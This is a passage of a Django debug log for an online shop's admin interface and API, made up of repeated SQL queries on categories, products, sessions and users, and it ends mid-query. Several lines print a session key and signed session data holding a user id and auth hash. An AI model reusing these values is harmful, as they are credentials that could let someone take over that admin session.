07:11:00,630 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:11:00,636 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:11:00,639 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:11:00,643 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:11:00,647 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:11:00,651 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:11:00,655 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:11:00,659 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:11:00,663 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:11:00,667 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:11:00,671 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:11:00,674 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:11:00] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [16/Dec/2019 07:15:08] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 07:15:58,217 utils 20136 140506422044416 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-16T07:15:58.207900+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 16, 7, 15, 58, 207900, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-16 07:15:58,219 utils 20136 140506422044416 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-16 07:15:58,251 utils 20136 140506422044416 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-16 07:15:58,260 utils 20136 140506422044416 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-30T07:15:58.258593+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 30, 7, 15, 58, 258593, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [16/Dec/2019 07:15:58] "GET / HTTP/1.0" 200 8878 [16/Dec/2019 07:15:58] "GET /static/admin/css/dashboard.css HTTP/1.0" 304 0 DEBUG 2019-12-16 07:15:59,411 utils 20136 140506422044416 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-16T07:15:59.402698+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 16, 7, 15, 59, 402698, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-16 07:15:59,413 utils 20136 140506422044416 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-16 07:15:59,448 utils 20136 140506422044416 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-16 07:15:59,455 utils 20136 140506422044416 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-30T07:15:59.454466+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 30, 7, 15, 59, 454466, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [16/Dec/2019 07:15:59] "GET / HTTP/1.0" 200 8878 [16/Dec/2019 07:15:59] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 304 0 [16/Dec/2019 07:15:59] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 304 0 DEBUG 2019-12-16 07:16:16,430 utils 20136 140506422044416 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-16T07:16:16.421257+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 16, 7, 16, 16, 421257, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-16 07:16:16,436 utils 20136 140506422044416 (0.004) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-16 07:16:16,444 utils 20136 140506422044416 (0.005) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-16 07:16:16,446 utils 20136 140506422044416 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-16 07:16:16,457 utils 20136 140506422044416 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC; args=() DEBUG 2019-12-16 07:16:16,608 utils 20136 140506422044416 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-30T07:16:16.605708+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 30, 7, 16, 16, 605708, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [16/Dec/2019 07:16:16] "GET /shop/product/ HTTP/1.0" 200 10007 [16/Dec/2019 07:16:16] "GET /static/admin/css/forms.css HTTP/1.0" 304 0 DEBUG 2019-12-16 07:16:16,971 utils 20136 140506422044416 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-16T07:16:16.961874+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 16, 7, 16, 16, 961874, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-16 07:16:16,973 utils 20136 140506422044416 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [16/Dec/2019 07:16:16] "GET /jsi18n/ HTTP/1.0" 200 3223 [16/Dec/2019 07:16:17] "GET /static/admin/css/widgets.css HTTP/1.0" 304 0 [16/Dec/2019 07:16:17] "GET /static/admin/img/sorting-icons.svg HTTP/1.0" 200 1097 DEBUG 2019-12-16 07:16:24,026 utils 20136 140506422044416 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-16T07:16:24.016208+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 16, 7, 16, 24, 16208, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-16 07:16:24,030 utils 20136 140506422044416 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-16 07:16:24,034 utils 20136 140506422044416 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 2; args=(2,) DEBUG 2019-12-16 07:16:24,045 utils 20136 140506422044416 (0.001) SELECT "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_content_type" WHERE ("django_content_type"."app_label" = 'shop' AND "django_content_type"."model" = 'product'); args=('shop', 'product') DEBUG 2019-12-16 07:16:24,084 utils 20136 140506422044416 (0.003) DECLARE "_django_curs_140506422044416_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:16:24,153 utils 20136 140506422044416 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-30T07:16:24.150645+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 30, 7, 16, 24, 150645, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [16/Dec/2019 07:16:24] "GET /shop/product/2/change/ HTTP/1.0" 200 11326 DEBUG 2019-12-16 07:16:24,496 utils 20136 140506422044416 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-16T07:16:24.487750+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 16, 7, 16, 24, 487750, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-16 07:16:24,499 utils 20136 140506422044416 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [16/Dec/2019 07:16:24] "GET /jsi18n/ HTTP/1.0" 200 3223 [16/Dec/2019 07:16:24] "GET /static/admin/js/change_form.js HTTP/1.0" 304 0 [16/Dec/2019 07:16:24] "GET /static/admin/js/prepopulate_init.js HTTP/1.0" 304 0 [16/Dec/2019 07:16:24] "GET /static/admin/img/tooltag-arrowright.svg HTTP/1.0" 200 280 DEBUG 2019-12-16 07:16:38,791 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:16:38,798 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:16:38,801 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:16:38,803 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:16:38,807 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:16:38,809 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:16:38,811 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:16:38,813 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:16:38,816 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:16:38,819 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:16:38,821 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:16:38,823 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:16:38,825 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:16:38,828 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:16:38,831 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:16:38,833 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:16:38,835 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:16:38,838 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:16:38,840 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:16:38,843 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM 